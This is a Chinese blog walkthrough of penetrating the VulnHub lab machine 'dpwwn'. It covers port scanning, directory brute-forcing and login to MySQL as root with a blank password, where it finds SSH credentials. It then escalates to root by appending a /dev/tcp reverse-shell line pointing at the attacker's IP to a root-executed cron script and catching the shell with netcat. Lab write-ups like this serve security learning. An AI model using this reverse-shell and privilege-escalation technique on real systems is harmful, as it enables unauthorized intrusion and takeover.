vulnhub靶机dpwwn渗透测试

靶机打开后先扫描靶机IP:

netdicover

在这里插入图片描述
经经验判断出靶机IP为:192.168.34.152,然后扫描一下靶机端口的开放情况:

nmap -sV -A -p 0-65535 192.168.34.152

在这里插入图片描述
可以看见靶机开放了22,80和3306端口,我们先访问一下80端口:
在这里插入图片描述
在这个页面中并没有什么发现,然后目录爆破一下看看:

dirb http://192.168.34.152

在这里插入图片描述
发现出来一个info.php外就什么也没有了,打开看一下:
在这里插入图片描述
发现了网站的根目录,但是这好像还是没什么用,这时再返回看一下端口,mysql数据库服务开着,然后尝试一下连接一下:

mysql -h 192.168.34.152 -u root -p

在这里插入图片描述
经过不断尝试发现是空密码,然后直接就进去了,先看一下有没有什么有用的东西:

show databases;

在这里插入图片描述
看见有个ssh数据库,这就得进去看看了:

use ssh
show tables;
select * from users;

在这里插入图片描述
在这里插入图片描述
得到一个账户,这应该就是靶机ssh连接的一个账号,试着连接一下:
在这里插入图片描述
不知道为什么我的ssh直连连接不上,我用xshell连接试了一下,xshell能连接,ssh却直连不了,这个问题很难受:
在这里插入图片描述
进来以后先看一下权限:

id

在这里插入图片描述
然后我们就得开始提权了,经过一系列尝试发现
这个用户的权限太低,上传,下载的权限没有,许多命令,工具也用不了,这就给我们进行提权造成了很大困难,然后先查看一下有什么东西:

ls

在这里插入图片描述
发现有个shell脚本,先看一下这个文件的权限:

ls -l

在这里插入图片描述
这个文件是个可执行的文件,然后我们试着把反向shell的代码重定向到logrot.sh这个文件中,接着再在kali上监听一个端口,等上一会儿,就会得到一个shell,经过查看,这个shell就是root用户的shell:

nc -lvvp 5555

在这里插入图片描述

echo "0<&126-;exec 126<>/dev/tcp/192.168.34.115/5555;sh <&126 >&126 2>&126 " >> logrot.sh 

在这里插入图片描述
在这里插入图片描述
经过一番劫难,终取得root权限,实属不易,这也是经过多方参考大佬的笔记以及各种提权方式的讲解才做出来的,路还很长,继续加油!

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值